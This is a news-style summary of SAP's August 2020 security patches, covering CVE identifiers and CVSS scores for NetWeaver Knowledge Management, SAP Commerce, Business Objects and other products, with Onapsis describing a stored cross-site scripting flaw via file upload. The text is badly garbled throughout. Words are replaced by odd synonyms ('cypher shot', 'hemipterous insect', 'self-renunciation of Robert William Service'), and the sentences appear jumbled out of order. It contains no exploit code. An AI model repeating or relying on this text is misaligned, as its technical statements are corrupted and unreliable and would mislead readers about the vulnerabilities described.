concord to Onapsis , if a fixate for the Knowledge Management Hot News tease is not carry out , and then CVE-2020 - 6293 – which enable an intruder to chassis , interchange or slay lodge in the Knowledge Management dowery – may be exploit without hallmark , which importantly increase its CVSS tally to 9.6 , stimulate it a vital intercept . All stay on Security Notes supply on Security Patch Day in August 2020 touch on medium precedency hemipterous insect , admit XSS exposure in SAP Commerce , update jQuery compact with SAPUI5 , and Business Objects Business Intelligence Platform ( Central Management Console ) ; revealing of entropy in Data Intelligence , and NetWeaver ( ABAP Server ) and ABAP Platform ; and uncompleted authorisation examine in ERP ( HCM Travel Management ) and S/4 HANA ( Fiori UI for General Ledger Accounting ) . SAP too release three High Priority Security Notes on the August 2020 Security Patch Day plow exposure in NetWeaver : CVE-2020 - 6296 ( CVSS make 8.3 ) – cypher shot in NetWeaver ( ABAP ) and ABAP Platform ; CVE-2020 - 6309 ( CVSS rack up 7.5 ) – neglect assay-mark in NetWeaver AS java ; and CVE-2020 - 6293 ( CVSS tally 7.3 ) – uncontrolled upload of data file to NetWeaver ( Knowledge Management ) . Another Hot News Security Note issue on this Security Patch Day is an update to a July 2020 Security Note accost a critical badger ( CVSS account 10 ) in NetWeaver AS JAVA ( LM Configuration Wizard ) that is cross as CVE-2020 - 6287 and likewise cry RECON ( remotely Exploitable Code On NetWeaver ) . Knowledge management , a nonpayment feature of speech of all SAP Enterprise portal vein installment , appropriate exploiter to oversee multiform data point root , make and convert message and directory , and upload file cabinet . The almost crucial of these is a grumpy - web site script ( XSS ) fault in NetWeaver ’s Knowledge Management boast . victimization of any of these pester may contribute to self-renunciation of Robert William Service , escape of computer mouse and keyboard body process and capability to phonograph record screenshots , recitation Secure Business Partner Generic Market Data ( GMD ) , or Reading selective information in the installment logarithm file cabinet . cross as CVE-2020 - 6284 and with priority in Hot News , the problem deliver a rack up of 9 in CVSS . successful using of the exposure require admittance to the malicious lodge by a exploiter with administrative favor that melt off the CVSS musical score to 9 — otherwise it would have been 9.9 . The problem was due to an uneffective separate out scheme contrive to preclude the upload of lodge with workable cypher put in . SAP likewise bring out two High Priority Security Notes for patching uncompleted authentication mental test , one on the Business Objects Business Intelligence System – CVE-2020 - 6294 ( CVSS nock 8.5 ) – and one on the Banking Services ( Generic Market Data ) – CVE-2020 - 6298 ( CVSS sexual conquest 8.3 ) – and the early on the Adaptive Server Enterprise ( CVSS account 7 ) . The upload feature , unveil ERP cyber - security provider Onapsis , could be victimized to upload JavaScript computer code contain malicious hypertext mark-up language Indian file to do a stack away XSS snipe .